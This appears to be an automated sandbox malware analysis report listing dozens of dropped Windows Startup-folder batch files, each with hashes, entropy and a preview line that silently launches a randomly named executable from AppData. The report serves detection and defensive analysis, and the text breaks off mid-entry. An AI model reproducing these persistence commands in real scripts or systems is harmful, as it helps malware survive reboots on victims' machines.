                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\vMRsi4avLKS3BjZRk9vaqhZz.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNOt66EI4etu2JX94D2Yxd2b.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.735072920973699
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5X5xisL:fE1sZ23pxisL
                                                                                                                                                                                                                                MD5:9901A186F671BA05615F5A6DEB986345
                                                                                                                                                                                                                                SHA1:A14AB5E9B7D3AE1C6DAF2FD5ABD15398295E1137
                                                                                                                                                                                                                                SHA-256:C3C361547183F959594FA0F8145B65CF0AC1631120A8205BBAB4D6B963926D16
                                                                                                                                                                                                                                SHA-512:DCC46C8D081B456D34C02919302ED67CA4503DDC35FD8AD81E4BEF5DB3DA07BB9B617A41463B31F04950B2093F82E877209F3A3AC0E6D278628EDB05ED48484A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\rCkxIY3aeSpXebK5FfkxePC4.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oZiUKJGSA8G9xcONfqSnC56U.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.789168479391829
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5DxxfS3TNR3LAdiFn:fE1sZ23r674m
                                                                                                                                                                                                                                MD5:7EC599F545FC5787A1CB8FD19C266ADE
                                                                                                                                                                                                                                SHA1:23E0472742052A1159CDFA7B7C1D1E9CE3FFAF4D
                                                                                                                                                                                                                                SHA-256:109ACC7107358E125CB46FF4C0DEF9EAC75FDF339903BA1A3DC33D1F137421B8
                                                                                                                                                                                                                                SHA-512:4E4C8D18AA559B3AEB1D2D97C985D862B57E5E01BBFFDC1E026411CEEB9217D8BB557634B54E065D832A3A9CC72B54939AAD4BBD7FEDB3D93DE0464F15BEEABF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\fUzbEYrAlNz7Rv11K6EiLt1x.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pc0fUYEqajLGUWQtn2ftxoqL.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.052964697592256
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5W0cfzveqmIkdan:fE1sZ23W5zve2D
                                                                                                                                                                                                                                MD5:7812A6333CCDFAC832EE8C876C00313F
                                                                                                                                                                                                                                SHA1:93510A281EC8E6DC7F97AF1870B3893B501CDC68
                                                                                                                                                                                                                                SHA-256:74908A084F223267F0D491EF18C796FE1C16203B2BC47BD9389F71A057597BEA
                                                                                                                                                                                                                                SHA-512:27E8AC8304598C3721C6E3A7774D48E8EC27109B840A0DC66FA0C72C00E9D289874ACF539C9DDB3A565F2CA9455655CA9854C731C4434FF66A1FA8257BDE4C92
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qjWESUwN5QphEhjbuV2RyE3e.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.771123370727532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J59gtS6fycJF:fE1sZ23/6fycJF
                                                                                                                                                                                                                                MD5:E98184E2CC0CD7EF62631A627C84779A
                                                                                                                                                                                                                                SHA1:A63D183BCF844A163DCA5CE00E7D86634F4F6CD0
                                                                                                                                                                                                                                SHA-256:F3E85E0B6E4DB1543C01EAB199D45C85BA02DDBF12D39BE6C4DDE92F50C7C780
                                                                                                                                                                                                                                SHA-512:D1051E272442F61B9376F4B6C8962BEA4A39AC8C0D5321C275509E63B23B3A267F6864683D43C68354AA06BC3DF121AB2A1BB341E12B74099F0F858EA0657C24
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XE6DyfdivLtuouzog1ddAcWy.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0iR2ukaNLwNYvPx5HIxG52l.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WMW0Wtmbvn:fE1sZ23WMzWtmbv
                                                                                                                                                                                                                                MD5:F42D502F984046D7B53A4C5707BBE091
                                                                                                                                                                                                                                SHA1:A0EEA5A0668F90878B962BE6C0AAC04DD43CC7D5
                                                                                                                                                                                                                                SHA-256:3DDEB5AC7EB91AFFB8913374920D06EDD6E99A9CB6AD40F2FC793F64FC58B069
                                                                                                                                                                                                                                SHA-512:4C2DECE233231F5E39332B7868173E141E8BAC2A0E9DFEF4E63C67246A47DBCCE6EC8157028D768D8FB55E991F98224059E3AF05123285F83330574B6F56356E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\sih6EQ3BvpoPxj5e02CfNWP2.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVMvJuock0EvSLQr8i6oWa6o.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.865791037041148
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jgNqq0CHFn:fE1sZ23UNqqJF
                                                                                                                                                                                                                                MD5:A0DB1AE16B7E57C45299468E6688BD7A
                                                                                                                                                                                                                                SHA1:DB98A94A52891ACC728597AA323CAD1357D51698
                                                                                                                                                                                                                                SHA-256:E2DA71F0CC4B29160C765B840F4483F7D0623859F6FFA8FE1042E897DD683B00
                                                                                                                                                                                                                                SHA-512:ABC842ACBF6CCCCBF8E299CD95E22C2AFF36A9A2E7728923A654821B0078839F76E61BF98980003C2ACD343474278A2326022F5D82DF2027C09957A0BFBF1E2A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FcF2JyfJLWaSsoJShTukNm1O.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rn8SDNMr1p6wepdx6lkoczBh.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.736248414835261
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RiMBhZEFptAdAl:fE1sZ23lAptAdAl
                                                                                                                                                                                                                                MD5:B60AD8CDA760C01045F73CC94AE09601
                                                                                                                                                                                                                                SHA1:C814F38162A74FC6FC0D488875F4F4BD135EDA06
                                                                                                                                                                                                                                SHA-256:9D3FB662C74950271DFC6B2242300993B8D1F839316BAA583A13E019B6951637
                                                                                                                                                                                                                                SHA-512:0C3E279C214717FA71AFC5862A6473351B86957C11F50628364ACE8D8EB4FEBBB7055BC7BC1D2936F512E278EBFD94903C0B3A174A45E430AAA5A1AA46754860
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tGiGhkaVGjaUagcI8QYmh6fh.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sPufcIhuWOPTECewJPFroVOs.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859071
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J59UiDOVVm8O0dm:fE1sZ23B49O0dm
                                                                                                                                                                                                                                MD5:8AABFE318364B87E58B5113E7DF701F8
                                                                                                                                                                                                                                SHA1:F8B8C00B9BEAD659412204F70F13E15408E576E4
                                                                                                                                                                                                                                SHA-256:9470DA3B8EB2F61DA664C9C9717A8F42F90DF5709312C1750B8BE06CE5355598
                                                                                                                                                                                                                                SHA-512:6CD8C4DEEE3471EC9DD38830B529DFC6A2017C1EE63C7FDF39D134DEF58F30EDFF713E942A8BEC1CAA29EC42A21DEA3D7493DD385B92C1DFD6FE695A864C84CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sS6m1zJ7SM7VOu619Ye9oRPC.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.907164268523369
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5swD85PJiFn:fE1sZ23swqiF
                                                                                                                                                                                                                                MD5:1E0FD55883ACCDD35A5EC0BB358835DD
                                                                                                                                                                                                                                SHA1:236118200F91ECB6432DAD6296F2FEA4B0243B3D
                                                                                                                                                                                                                                SHA-256:90CDA36011E8C56C6178EAFBCCE089626214ED8CF2346AD5985EE819DB7303DF
                                                                                                                                                                                                                                SHA-512:39B2FA9FD2A9E2FD3F6BEA7B2C71D7EA93B52AFDCF3E54E5DF88706FFE59B01385EF0C0AEC3A2655F9ADC93F6FCA45D9F16E936F881705EC4503268555E715F4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\I7GsKiDVRkgU0AqHrZJ1PiD5.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t1VNoyGIaOw1GtxZ1M3tjpAQ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.987016080180281
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5TaX5u5VNl:fE1sZ23YeVv
                                                                                                                                                                                                                                MD5:CBFC3693175B87EE2CBB70F0C07C89B4
                                                                                                                                                                                                                                SHA1:4DCC7F755116CCED5F08746FD7A384CA17C10A2E
                                                                                                                                                                                                                                SHA-256:AE0F6288D239A009F1DB1CD1D42F69AADC9FF9641C4502227DEF040B9B2CFB99
                                                                                                                                                                                                                                SHA-512:59E6FC77103CD30D3B9C999EE9D85195237B7FB117A8348CA9EB37DFBF9BCF9EB803AC8D9D4AF2E8F3533F12C374D0CFEDBF2E6C64387F652BD3B812F02F40FD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t5Sezk8AJ1dVCIp8NlarOJfh.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842088543948397
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5Jqbqeu4dI39QVLNHF:fE1sZ23Kt039aLVF
                                                                                                                                                                                                                                MD5:4BDF081DD34CFB57E6E2A3320E9B01CE
                                                                                                                                                                                                                                SHA1:27309FDC169BBABEF5368C09423B604A5AA2BBB3
                                                                                                                                                                                                                                SHA-256:E133D24301A4C28CAFA2B710F7BF085180D5B256EE2EC0E24F9236D0273EF8BD
                                                                                                                                                                                                                                SHA-512:71EF39943CF8D5CAD8116955BDA126D36070FD5DAAD5D158E39D2F4D6771D07982C0B573E6262A489CE07A839ED9791EC2575EC9359101206C3BB2D15B6F62A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\lOl0Z8MedrKL384KSuZP1lEu.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tnYvJsdw6gVMo54pPIPOTk7f.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859072
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RtzxHq/av9:fE1sZ23LsO
                                                                                                                                                                                                                                MD5:118873A9E6F6613F5ACCC06DF4186F0E
                                                                                                                                                                                                                                SHA1:6E2A6A85A30304225958A718E3C8C2DC3E27748A
                                                                                                                                                                                                                                SHA-256:FCE9BAF4FD60B3DA0EBA4545228EE53B9C030D21635EAFC135CCFC24DD946D4E
                                                                                                                                                                                                                                SHA-512:48E26F55E44DA6890A65CFFA23E4B949883C594392EFC1C00F04472587933CEA7C8E2AB65AF8D5993024A3F214B6B1A3CA0D8672612EB73C89EF44412A2693E6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tsbzRFmTsKBykEPO6dTSp6Bo.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.933255124462213
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WHx+fc9DuELVF:fE1sZ23WR+fwDLJF
                                                                                                                                                                                                                                MD5:EB20713AD4FB538B03D6FC68AA62D7F3
                                                                                                                                                                                                                                SHA1:8FF2CE957CE9E6435B613C1E1A9920B490A56E8C
                                                                                                                                                                                                                                SHA-256:C4942A11FD8D4E09E19834AF447BCF72B42EA42A9A82D4695082EA94923FD025
                                                                                                                                                                                                                                SHA-512:4696DDC9B8CA99066C37AF71E227BF14D469725AEF3B0CE9CBFE39BAED491E7B05B47CE044EABB9BB9F317B95B07DAED7B8AB9EABEB381E12444F9F73C20DFC1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3byEz2syG9SedsHKOY8fjUva.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.907164268523369
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5zR3Xpt+DdAl:fE1sZ2393H+Bm
                                                                                                                                                                                                                                MD5:C1A0868B395F1EF5047D178412566ADE
                                                                                                                                                                                                                                SHA1:399C7611ED852E7191EB1840B0C742C036637E65
                                                                                                                                                                                                                                SHA-256:EC0B439BC9B4B9F12BE3D9E595472C3084A3D9EC556DDB3BDE73233900ED73E1
                                                                                                                                                                                                                                SHA-512:36F446BBA23812004FF44E6F75B9F488BE2FB4F8A4970ECCECAA33EED983758D69C9A7DF369BBBFF9D80ABF47CB8A657CB3CFEEB6C358785F0C2E871128BCE6D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u5dGk12YYILlpzhYxk2XzgEM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933903
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5nOF2mJFn:fE1sZ232L
                                                                                                                                                                                                                                MD5:FE5D7A2FB46B5B834867082BA13553F6
                                                                                                                                                                                                                                SHA1:97E4B4455BF9D7989473832145F58A550E068F8E
                                                                                                                                                                                                                                SHA-256:C693E66C83CC5948294854758CEE9FAD0F50007082B15633C619C4F1B22B00DE
                                                                                                                                                                                                                                SHA-512:F36012C4A8D1384051F0FA9736EDF3B12C5FD26F103AE28ABC718BF03FDCB8743309E9E683FF93D05D0BFA496A19E626CF22FC2A9E3CFD116486C3D9CBD02038
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v626yA0xMjbBDle6UIsKMxMX.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.74984900805564
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5S3GAXam8jkdAl:fE1sZ23S2A9tdm
                                                                                                                                                                                                                                MD5:B1B6998AA54992B34E7D56086EEE0ADD
                                                                                                                                                                                                                                SHA1:0BECD4E7A5270A79BBB93B229D894A365DC7E820
                                                                                                                                                                                                                                SHA-256:43FDD9EA844340D18A89F05DC84117998D73771150AD0C5A6361B2690C4B5817
                                                                                                                                                                                                                                SHA-512:239AD0798A54C5902DB06F0AF114B0AFB6061477C78BCA8833AD39A6255944CC3A0D90226C416187B22CC19A4B1EBE2E93027A0CA16B5228F8EACE365D3EA1F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wW4vGceNlpE9ACIAc69a33Yc.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfdWx9QBHbiX53OVW3ybKn3w.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.965135283016122
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5fRRWxkVuPneDAdm:fE1sZ235RWx6uGAs
                                                                                                                                                                                                                                MD5:203BF143CE43CDEA51A5CDACDB1E2241
                                                                                                                                                                                                                                SHA1:4C00E1C15E38F9181B841C8BE99A0503F15B1665
                                                                                                                                                                                                                                SHA-256:10FEDD57ED4599DA285D8FB059CBE54322EA7E3EB5D926D7AC305CFC49507B77
                                                                                                                                                                                                                                SHA-512:99E811294660883CBFD30161B264FAB805900A6D93FCCEEEC723D6BAF898B1950D8BE17AE3F964DF3A28115A38B18741C5AC8EADF59630247EC9935D07419385
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\z443T0kZxO5VAxRMw1cjpQdZ.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnPWh6gigyeyZklNGZd5SKHQ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.9107787922352575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5ExSd7Yi0kiykdan:fE1sZ23Es7fiyD
                                                                                                                                                                                                                                MD5:86560037A2C29EE6F1A5270019BC0DAB
                                                                                                                                                                                                                                SHA1:622F0E33F6BDF4263AC2324CD1BF504A2715AC11
                                                                                                                                                                                                                                SHA-256:82BEE5388BB95AF3E5F07EE24B31F8BA329A1702472056B2E7A45C8A9A03C9D2
                                                                                                                                                                                                                                SHA-512:681AE4BE6698231FDC5605F1A63A41B96AB4D7212825078F8A704E5722BAD6D168AF185D6F9DE548BBF39609F2FB60D68193D72AE5F31CB38CC42A04F9548836
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpfphpa0v7Nt73NmqVDrheEB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8580798924666615
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5tcdjwKCtZLLv:fE1sZ23L5J
                                                                                                                                                                                                                                MD5:480A3F6AAE4D1E6A356F79D64B9E6510
                                                                                                                                                                                                                                SHA1:55C8C37DA34CAB2AFC04B3D8ED460DC02138C342
                                                                                                                                                                                                                                SHA-256:40BB570B20A20F101BDED6022EF3831F1DBBEDB79745D76726CF38389C67193E
                                                                                                                                                                                                                                SHA-512:D56C0C11E2BF1F1E9A0422A3A7043D3B922C66F4CF699FC1A60F9FA5F406611A642027BCCA0A1E1DADB4BE1859F8BBD20B493BCD1117A2DEEEEACB0CDBA297DD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsTljUDyfomCxhnzNXfr7Xm9.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.764999465412405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5cvd2NUWRy0Cl:fE1sZ23cVqUWy0Cl
                                                                                                                                                                                                                                MD5:142712B940F9E2940DA23E2FA20A6A6E
                                                                                                                                                                                                                                SHA1:59EC8FF2FAF8B4B7C00CC240BA0694D7A5B9FFC7
                                                                                                                                                                                                                                SHA-256:FB2BBEF4245D5502DC1E3AA935B910511B0D2BCA8F1BEF5DB9F433A5F46F51E9
                                                                                                                                                                                                                                SHA-512:2F9CAC9025089A8AA1DC5C7CC8804682CD946194AEC8479382FD19A2D07788C96BF63920051027290DAFCCD8422A51A52C6402E79A3B3233ADCB494D0886DA1C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ylpTCbqw6Bd6MUStDnsoxMXB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.882014449776854
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WfdziAcmsJl:fE1sZ23W1z58Jl
                                                                                                                                                                                                                                MD5:9C01787D515879328F85EA00662A9B8B
                                                                                                                                                                                                                                SHA1:4B5F365B56A7716385380AC3E8C8A775E5C6E4A0
